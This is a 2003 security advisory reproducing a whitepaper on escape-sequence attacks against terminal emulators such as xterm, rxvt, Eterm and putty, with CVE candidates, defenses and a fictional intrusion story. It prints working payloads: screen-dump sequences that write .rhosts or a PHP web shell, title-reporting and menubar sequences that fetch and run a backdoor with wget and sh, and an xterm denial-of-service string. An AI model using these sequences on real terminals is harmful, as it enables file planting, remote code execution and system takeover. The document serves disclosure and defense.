25th Feb 2003 [SBWID-6022]
COMMAND
	Hacking terminal emulators
SYSTEMS AFFECTED
	[ Test Emulator Versions ]
	
	xterm:          xf86 4.2.0  (patch 165)
	aterm:          0.42
	rxvt:           2.7.8
	Eterm:          0.9.1
	konsole:        3.1.0 rc5
	putty:          0.53
	SecureCRT:      3.4.6
	gnome-terminal:	2.0.2 (libzvt 2.0.1) [2.2 indirectly]
	hanterm-xf:     2.0
	
	[ Vulnerability Index ]
	
	The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE 
	candidate namess for all issues described in this paper. 
	CAN-2003-0020 Apache Error Log Escape Sequence Injection
	CAN-2003-0021 Screen Dump: Eterm 
	CAN-2003-0022 Screen Dump: rxvt
	CAN-2003-0063 Window Title Reporting: xterm 
	CAN-2003-0064 Window Title Reporting: dtterm
	CAN-2003-0065 Window Title Reporting: uxterm
	CAN-2003-0066 Window Title Reporting: rxvt
	CAN-2003-0067 Window Title Reporting: aterm
	CAN-2003-0068 Window Title Reporting: eterm
	CAN-2003-0069 Window Title Reporting: putty
	CAN-2003-0070 Window Title Reporting: gnome-terminal
	CAN-2003-0078 Window Title Reporting: hanterm-xf
	CAN-2003-0071 DEC UDK Processing DoS: xterm
	CAN-2003-0079 DEC UDK Processing DoS: hanterm-xf
	CAN-2003-0023 Menubar Manipulation: rxvt
	CAN-2003-0024 Menubar Manipulation: aterm
	
PROBLEM
	From  TERMINAL  EMULATOR  SECURITY  ISSUES  whitepaper  by  H  D  Moore,
	Copyright � 2003 Digital Defense Incorporated, All Rights Reserved :
	
	 [ Credits ]
	
	This paper was written by H D Moore, with much help  from  the  rest  of
	the Digital Defense  Operations  Team.  I  would  like  to  thank  Solar
	Designer for providing some great feedback on  the  original  draft  and
	Mark  Cox  for  handling  the  CVE  candidate  generation   and   vendor
	coordination.
	
	 [ Summary ]
	
	Many of the features supported by  popular  terminal  emulator  software
	can be abused when un-trusted data  is  displayed  on  the  screen.  The
	impact of this abuse  can  range  from  annoying  screen  garbage  to  a
	complete system  compromise.  All  of  the  issues  below  are  actually
	documented features, anyone who takes the time  to  read  over  the  man
	pages or source code could use them to carry out an attack.
	
	 [ Disclaimer ]
	
	There is nothing new in this paper. The entire concept of  exploiting  a
	terminal by supplying hostile input has been around for  over  10  years
	now. Unix veterans and BBS users have  been  exposed  to  this  type  of
	problem since the very beginning, a newsgroup search  can  turn  up  all
	sorts of exploits, from the ever-popular "flash" program  to  the  abuse
	of logging features in xterm which were disabled in  R5.  Therefore  the
	purpose of this paper is to identify weaknesses in the current suite  of
	popular terminal emulation software, not to rehash an ancient problem.
	
	 [ Escape Sequences ]
	
	Typically, an escape sequence is a series of  characters  starting  with
	the ASCII escape character (0x1B) and followed  by  a  specific  set  of
	arguments. Escape sequences were  originally  used  to  control  display
	devices such as dumb terminals and have been extended to  allow  various
	forms of interaction with modern operating systems. An  escape  sequence
	might be used to  change  text  attributes  (color,  weight),  move  the
	cursor position, reconfigure the keyboard, update the window  title,  or
	manipulate the printer. Over the years,  many  new  features  have  been
	added that required enhancements to the terminal  emulator  applications
	to support them.
	
	 [ Remote Exploitation ]
	
	To exploit an escape sequence feature,  an  attacker  must  be  able  to
	display arbitrary data to  the  victim's  terminal  emulator.  While  at
	first glance that may  seem  rather  unlikely,  the  attacker  can  take
	advantage of a number of small bugs in other  applications  to  increase
	their chance of success.
	Just about every network service that uses syslog will pass remote  data
	directly to the daemon  without  filtering  the  escape  character.  The
	responsibility then lays on the syslog daemon to strip the  escape  code
	before writing the log entry to the disk or terminal. Although both  the
	stock *BSD syslog daemons as well the  sysklogd  package  filter  escape
	sequences, msyslog, syslog-ng, and the  logging  daemons  supplied  with
	many commercial UNIX-based operating systems do not.
	While sending data directly to a vulnerable syslogd  or  rwalld  service
	is the most direct form of attack, there are literally dozens  of  other
	ways to place hostile binary data onto the terminal of  a  remote  user.
	The Apache web server makes an effort to clean garbage from  its  access
	logs, but it still allows escape characters  to  be  injected  into  the
	error logs. Many command-line  network  tools  can  be  exploited  by  a
	hostile service response, some examples of this is include  wget,  curl,
	ftp, and telnet.
	Multi-user systems are especially vulnerable, as any  user  can  send  a
	system-wide message under the default configuration  of  most  operating
	systems. Placing the attack data  into  the  banner  of  a  popular  FTP
	server, telnet service, or message of the day  file  will  increase  the
	chance of finding a valid target. Certain console email  clients  refuse
	to display files when the content-type of an  attachment  is  set  to  a
	unrecognized value, so the user must save the file and then read  it  on
	the command line, often just using the standard "cat" utility.
	
	 [ Screen Dumping ]
	 
	Eterm and rxvt both implement what they call the "screen dump"  feature.
	This escape sequence will cause an  arbitrary  file  to  be  opened  and
	filled with the current contents of the terminal window. These  are  the
	only two tested emulators[1] that still had  the  ability  to  write  to
	files enabled by default. Although rxvt will ignore  dump  requests  for
	existing files, Eterm[2] will happily delete the file  and  then  create
	it again. Although it is technically the  same  feature,  the  OSC  code
	used to trigger it is different between the  two  emulators.  For  rxvt,
	the screen dump code is 55, for Eterm, it  is  30.  It  is  possible  to
	control the  entire  contents  of  the  file  by  specifying  the  reset
	sequence, then the required data, followed by the screen dump command.
	
	$ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"
	
	The same approach can be used to  create  an  authorized_keys  file  for
	SSH, a replacement passwd file, or even a hostile PHP script written  to
	the user's web directory. This attack requires  no  interaction  on  the
	part of the  user  and  would  be  very  difficult  to  detect  if  done
	correctly. The primary difference between this issue  and  some  of  the
	others mentioned  in  this  paper  is  that  the  actual  "exploitation"
	happens on the system running the emulator  software,  not  the  current
	system that the terminal is accessing. The code that is responsible  for
	opening the dump file is shown below.
	
	/* rxvt */ 
	if ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) 
	/* Eterm */ 
	unlink(fname);
	outfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);
	
	[1] XFree86's xterm disabled an  equivalent  feature  in  X11R5  due  to
	security concerns. It can still be enabled with a compile-time option.
	[2] Eterm actually disabled this in 0.9.2 (October  31,  2002),  however
	many recent Linux distributions still shipped with 0.9.1.
	
	 [ Window Title Reporting ]
	
	One of the  features  which  most  terminal  emulators  support  is  the
	ability for the shell to set the title of the  window  using  an  escape
	sequence. This feature was originally implemented  by  DEC  for  DECterm
	and has since been added to most emulators in use today.  The  easy  way
	to set the window title of a terminal is using the echo command:
	
	$ echo -e "\e]2;This is the new window title\a"
	
	When the output of the above command is displayed on  the  terminal,  it
	will set the window title to that string. Setting the  window  title  by
	itself is not much of a security issue, however certain  xterm  variants
	(and dtterm) also provide an escape sequence for reporting  the  current
	window title. This essentially takes the current  title  and  places  it
	directly on the command  line.  Due  to  the  way  that  most  emulators
	processes the escape sequence, it is not possible to  embed  a  carriage
	return into the window title itself, so  the  user  would  need  to  hit
	enter for it to process the title as a command. The escape sequence  for
	reporting the window title is:
	
	$ echo -e "\e[21t"
	
	At this point, the attacker needs to convince the user to hit enter  for
	the "exploit" to succeed. There are a number of techniques available  to
	both hide the  command  and  encourage  the  user  to  "press  enter  to
	continue". The simplest is to just  insert  a  prompt  followed  by  the
	"invisible"  character  attribute  right  before  reporting  the  title.
	Another method is to set the foreground and background colors to be  the
	same (all black or white) and hope the user  hits  the  enter  key  when
	trying to determine what  happened.  The  following  example  for  xterm
	demonstrates a sequence that downloads and  executes  a  backdoor  while
	hiding the command line. The "Press Enter >" string  should  be  changed
	to something appropriate for the attack vector. Some  likely  candidates
	include "wget internal  error:  press  enter  to  continue"  or  "Error:
	unknown TERM, hit enter to continue".
	
	$ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
	
	Any terminal emulator that allows the window title to be placed  on  the
	command-line is vulnerable to this attack. The applications  which  were
	confirmed vulnerable include xterm, dtterm, uxterm, rxvt, aterm,  Eterm,
	hanterm, and putty[1]. The tested applications that did  not  allow  the
	title to be written include gnome-terminal 2.0, konsole, SecureCRT,  and
	aterm.
	[1] Although putty would place the title onto the command-line, we  were
	not able to find a method of  hiding  the  command,  since  neither  the
	"invisible" character attribute nor the foreground color could  be  set.
	Putty has a relatively low limit to the number of  characters  that  can
	be placed into the window title, so it is not possible to  simply  flood
	the screen with garbage and hope the  command  rolls  past  the  current
	view.
	
	 [ Miscellaneous Issues ]
	
	Eterm should be given an award for the "Easiest to Compromise"  terminal
	emulator. The developers based much of their code off of  the  rxvt  and
	xterm source, so Eterm tends to share the same  problems  as  those  two
	emulators as well. If you happen to be running a CVS  version  of  Eterm
	from between February 10th and May 8th  of  2001,  it  was  possible  to
	execute an arbitrary command just by  displaying  the  following  escape
	sequence:
	
	$ echo -e "\e]6;73;command\a"
	 
	Fortunately, this feature never made it into an  official  release,  the
	"fork-and-exec" ability  was  replaced  by  the  script  action  spawn()
	instead.
	During the research process, a number of  small  bugs  were  found  that
	would either lock up the emulator completely or crash it. Although  they
	can be disregarded as simple denial of service attacks,  they  could  be
	abused to prevent an administrator from seeing subsequent logs during  a
	compromise. In general,  the  code  which  processed  application-  side
	input seemed to place little emphasis  on  sanitizing  the  data  before
	passing it directly to system-level  functions.  While  there  was  some
	effort made to avoid standard buffer overflows, much of  the  loop-based
	character processing appeared ripe for a denial of  service  attack.  An
	example of this is a bug in the DEC UDK processing  of  XFree86's  xterm
	application, the following command will place the process into  a  tight
	resource-eating loop:
	
	$ echo -e "\eP0;0|0A/17\x9c"
	
	This bug was reported to [email protected] on December 17th, 2002  and
	no response was received as of the  publication  of  this  writing.  The
	hanterm application is also vulnerable to this issue, as the  code  base
	started off as a direct copy of xterm.
	Both rxvt and aterm  support  a  feature  known  as  the  menuBar.  This
	feature allows the user to create drop-down menus  at  the  top  of  the
	terminal  screen  using  both  menu  configuration  files   and   escape
	sequences. Anyone able to display data on the terminal could modify  the
	menu entries in a way that would compromise the  system  when  accessed.
	This type of  attack  relies  more  on  social  engineering,  but  still
	provides a potential entry point when nothing  else  is  available.  The
	example below will create a new top-level  menu  item  called  "Special"
	with a single item labeled "Access", when clicked it will  download  and
	execute a backdoor from http://127.0.0.1/.bd and exit the shell.
	
	$  echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"
	
	
	 [ Terminal Defense ]
	
	The ideal solution is to sanitize all data before displaying it on  your
	terminal, however without a custom terminal application or data  filter,
	you can't guarantee that every tool  you  use  on  the  command-line  is
	going to strip escape sequences. The responsibility should rest  on  the
	actual terminal emulator; any features that allow file  or  command-line
	access should be disabled by default and more attention should  be  paid
	to new features that implement any use of escape sequences.
	The tested terminal emulators that were not susceptible  to  the  screen
	dump  or  window  title   attacks   include   KDE's   konsole,   Gnome's
	gnome-terminal, Vandyke's SecureCRT, and Sasha  Vasko's  aterm.  Konsole
	and gnome-terminal each use their own independent code-base  and  didn't
	try to support the same massive feature set  as  the  others.  SecureCRT
	took a similar  approach,  emulating  just  the  minimum  needed  to  be
	usable. With aterm, the code was originally based on rxvt, however  many
	of the dangerous features were removed as the project progressed.
	
	 [ A Fictitious Case Study ]
	
	Jim is the sole administrator for the web server farm  at  a  moderately
	sized ISP. Most of his company's clients maintain their  own  sites  and
	Jim's primary responsibility is to  keep  the  web  servers  online  and
	secured. Jim spends some of his spare time dabbling with  PHP  and  uses
	his workstation as his development system. The  workstation  is  on  the
	same network segment as the rest of the servers and  the  firewall  only
	allows TCP port 80 and 443 inbound. Jim has a new 2.5Ghz P4 and  finally
	has enough processing power to  run  the  Enlightenment  window  manager
	with all the tweaks.  His  favorite  part  about  Enlightenment  is  the
	terminal  emulator,  Eterm,  which  lets   him   make   the   background
	transparent and do all  sorts  of  imaging  tricks.  Jim  keeps  a  tail
	process running for the error_log  files  on  each  server  he  manages,
	allowing him to easily spot script  bugs  and  misconfigurations  before
	the customer calls him to fix it.
	Andre is pissed. Some "friends" from his old hacking group  have  posted
	some embarrassing photos of him on the group's home page.  The  page  is
	hosted in the ~user directory on a web server at some dinky ISP his  old
	friend uses. He starts poking at the web server only to  give  up  about
	30 minutes later after failing  to  find  a  single  vulnerable  CGI  or
	outdated service. He starts up Nmap again, this time on the whole  class
	C that the web server resides in, determined to  take  down  the  entire
	subnet if he has to. He finds another web server, this one is running  a
	traceroute gateway that is  vulnerable  to  meta-  character  injection.
	Andre manages to get an outbound shell  back  to  a  bounce  system  and
	proceeds to poke around. He finds what appears to be an  OpenSSH  public
	key in the /tmp directory, named JimH.pub. Looking at the key  file,  he
	sees that the userid stored  in  it  is  for  [email protected].  A
	quick check shows  that  jimsbox.weeisp.com  not  only  resolves  to  an
	external address, but is also running a web server.
	The index page of Jim's web server consists  of  a  couple  pictures  of
	him, some links to his favorite news sites, some screenshots of his  new
	super-leet desktop, and some of his latest PHP projects. The  first  PHP
	project  link  Andre  clicks  on  immediately  starts  spewing   errors,
	complaining about not being able to connect to the database.  The  error
	message itself is interesting though, since it contains  the  full  path
	to the script that triggered the error. Andre  makes  a  quick  note  of
	this and keeps digging around, hoping for an easy entry point.  As  soon
	as he pulls up the desktop screen shots, he knows he  struck  gold.  The
	screen shot not  only  shows  a  scantily  clad  Italian  model  in  the
	background, but an Eterm open tailing the logs of the  same  server  his
	pictures  are  being  served  from.  He  gets  to  work,   hitting   the
	workstation with every tool he can find, but  an  hour  later  he  still
	hasn't busted a shell. While looking through  the  screen  shots  again,
	Andre gets the idea to look at the  Eterm  documentation  and  see  what
	other features it supports. Not only is the documentation easy  to  read
	with  plenty  of  examples,  but  it  mentions  an  interesting  feature
	described as a "screen dump".
	About two hours later, Andre finally manages to get  Eterm  and  its  60
	megabytes of support libraries compiled.  He  discovers  that  to  force
	Eterm to write out a file, all  he  has  to  do  is  display  a  certain
	sequence of characters to the screen. The question now  is  how  to  get
	those characters onto that Eterm at 4:30 in the morning. After  a  quick
	review of the Apache source code, he finally finds a spot in  the  error
	handling code where he can inject arbitrary data  into  the  log  files.
	All he has to do is send a request for a file with the  escape  sequence
	he wants to use and Apache will write the unfiltered  data  directly  to
	the log file.
	Now that he can write arbitrary files to  the  workstation,  he  has  to
	find a method of using it to gain access. Andre is pretty sure that  the
	workstation is running SSH, but the only  ports  available  are  80  and
	443. He remembers that the PHP errors he saw earlier provided  the  full
	path to the web root, if he can write files there, then he run  commands
	through the web server. Five minutes later, Andre is connecting  to  the
	target web server and sending a GET request for a string generated  with
	the following command:
	
	$ echo -e "\ec<?passthru($c);?>\e]30;/home/www/htdocs/owned.php\a"
	
	This command clears the current screen buffer, displays his hostile  PHP
	code to the screen, and then uses the screen dump command  to  write  it
	into    the    web    root.     He     points     his     browser     to
	http://jimsbox.weeisp.com/owned.php?c=id  and  starts  the  process   of
	rooting Jim's workstation, stealing  his  SSH  keys,  and  taking  those
	horrid pictures (as well as the rest of the group's files) off  of  that
	web server.
SOLUTION
	Check your favorite terminal homepage :-)
	
	 [ References ]
	
	This   Paper   and   Associated   Tools    font    color=#00ff00>    ---
	http://www.digitaldefense.net/labs/whitepapers.html                  ---
	http://www.digitaldefense.net/labs/securitytools.html
	
	Recognized   Escape   Sequences   font   color=#00ff00>    ---    Eterm:
	http://www.eterm.org/docs/view.php?doc=ref          ---           xterm:
	http://rtfm.etla.org/xterm/ctlseq.html            ---            dtterm:
	http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm      ---
	rxvt:   http://www.rxvt.org/refer/rxvtRef.html
	
	Solar Designer's  Post  on  Syslog  Filtering  font  color=#00ff00>  ---
	http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350
	
	ADM's   "The   Evil   Escape   Sequences"   font   color=#00ff00>    ---
	http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory
	
	AmigaOS   Escape   Sequence    Exploits    font    color=#00ff00>    ---
	http://www.abraxis.co.uk/SA-2001-11-08.html
	
	MS-DOS/Windows    Key    Redefinition    font     color=#00ff00>     ---
	http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html
	
	Multiple  Emulator   Window   Resize   DoS   font   color=#00ff00>   ---
	http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html     ---
	http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion
	
	The      Original      "Flash"       font       color=#00ff00>       ---
	http://www.parallaxresearch.com/files/unix/exploits/flash.c          ---
	http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu     ---
	http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4